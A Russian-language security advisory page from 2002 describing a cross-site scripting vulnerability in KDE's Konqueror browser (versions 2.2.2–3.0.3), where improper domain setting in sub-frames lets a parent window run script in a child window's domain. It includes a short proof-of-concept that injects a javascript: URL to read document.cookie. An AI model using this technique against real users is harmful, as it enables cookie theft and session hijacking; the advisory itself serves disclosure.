Универсальный межсайтовый скриптинг в Konqueror (KDE)

Дата публикации:
13.09.2002
Всего просмотров:
795
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Когда окно браузера открывает другое окно, проверка защиты должна препятствовать родительскому окну обращаться к дочернему окну, если последнее относится к другому домену. Обнаружено, что Konqeuror не правильно устанавливает домен в sub-frames и sub-iframes. Уязвимость позволяет родительскому установить URL в пределах дочернего окна независимо от домена или зоны безопасности. Уязвимость позволяет, например, родительскому окну выполнять произвольный код сценария в контексте домена дочернего окна.

Пример:

<script language="jscript">
onload=function () {
    var oVictim=open("yahoo.com","OurVictim","width=100,height=100");
    setTimeout(
        function () {
            oVictim.frames[0].location.href=
"javascript:alert(document.cookie)";
        },
        7000
    );
}
</script>
Уязвимость обнаружена в KDE 2.2.2- 3.0.3

Ссылки: KDE Security Advisory: Konqueror Cross Site Scripting Vulnerability
или введите имя

CAPTCHA